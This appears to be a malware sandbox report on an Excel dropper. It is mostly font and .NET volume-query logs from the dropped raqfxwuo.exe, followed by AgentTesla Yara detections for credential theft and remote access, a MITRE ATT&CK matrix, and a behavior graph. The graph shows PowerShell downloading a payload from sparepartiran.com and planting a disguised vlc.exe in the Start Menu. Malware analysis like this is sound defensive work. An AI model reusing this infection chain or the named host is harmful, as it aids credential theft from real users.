                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Users\Public\raqfxwuo.exe VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Users\Public\raqfxwuo.exe VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeCode function: 18_2_07CCE9E0 GetUserNameA,
                Source: C:\Users\Public\raqfxwuo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information:

                barindex
                Yara detected AgentTeslaShow sources
                Source: Yara matchFile source: 00000015.00000002.924149098.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.926985798.0000000002D71000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.926541973.0000000002EB1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.899909340.0000000004351000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.899832989.00000000028A8000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.899751986.0000000003478000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.900029197.0000000003781000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.924181667.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: raqfxwuo.exe PID: 6512, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: raqfxwuo.exe PID: 6168, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: raqfxwuo.exe PID: 6484, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: raqfxwuo.exe PID: 1692, type: MEMORY
                Source: Yara matchFile source: 21.2.raqfxwuo.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.raqfxwuo.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000014.00000002.926985798.0000000002D71000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.926541973.0000000002EB1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: raqfxwuo.exe PID: 6512, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: raqfxwuo.exe PID: 1692, type: MEMORY

                Remote Access Functionality:

                barindex
                Yara detected AgentTeslaShow sources
                Source: Yara matchFile source: 00000015.00000002.924149098.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.926985798.0000000002D71000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.926541973.0000000002EB1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.899909340.0000000004351000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.899832989.00000000028A8000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.899751986.0000000003478000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.900029197.0000000003781000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.924181667.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: raqfxwuo.exe PID: 6512, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: raqfxwuo.exe PID: 6168, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: raqfxwuo.exe PID: 6484, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: raqfxwuo.exe PID: 1692, type: MEMORY
                Source: Yara matchFile source: 21.2.raqfxwuo.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.raqfxwuo.exe.400000.0.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management Instrumentation111Registry Run Keys / Startup Folder11Process Injection112Disable or Modify Tools11Input Capture1Account Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScripting2Boot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder11Scripting2LSASS MemoryFile and Directory Discovery2Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsExploitation for Client Execution3Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information21Security Account ManagerSystem Information Discovery24SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsPowerShell3Logon Script (Mac)Logon Script (Mac)Software Packing3NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol22SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading111LSA SecretsSecurity Software Discovery221SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion4Cached Domain CredentialsVirtualization/Sandbox Evasion4VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 324135 Sample: TcLt4.xls Startdate: 28/11/2020 Architecture: WINDOWS Score: 100 42 Multi AV Scanner detection for domain / URL 2->42 44 Multi AV Scanner detection for dropped file 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 10 other signatures 2->48 7 powershell.exe 14 21 2->7         started        12 powershell.exe 21 2->12         started        14 EXCEL.EXE 35 22 2->14         started        16 2 other processes 2->16 process3 dnsIp4 38 sparepartiran.com 162.223.88.131, 49788, 49789, 80 COLOUPUS United States 7->38 36 C:\Users\Public\raqfxwuo.exe, PE32 7->36 dropped 56 Drops PE files to the user root directory 7->56 58 Powershell drops PE file 7->58 18 raqfxwuo.exe 1 5 7->18         started        22 conhost.exe 7->22         started        40 192.168.2.1 unknown unknown 12->40 24 raqfxwuo.exe 12->24         started        26 conhost.exe 12->26         started        28 splwow64.exe 14->28         started        file5 signatures6 process7 file8 34 C:\Users\user\AppData\Roaming\...\vlc.exe, PE32 18->34 dropped 50 Multi AV Scanner detection for dropped file 18->50 52 Machine Learning detection for dropped file 18->52 54 Injects a PE file into a foreign processes 18->54 30 raqfxwuo.exe 18->30         started        32 raqfxwuo.exe 24->32         started        signatures9 process10

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                TcLt4.xls25%VirustotalBrowse
                TcLt4.xls52%ReversingLabsDocument-Office.Trojan.Powload

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe100%Joe Sandbox ML
                C:\Users\Public\raqfxwuo.exe100%Joe Sandbox ML
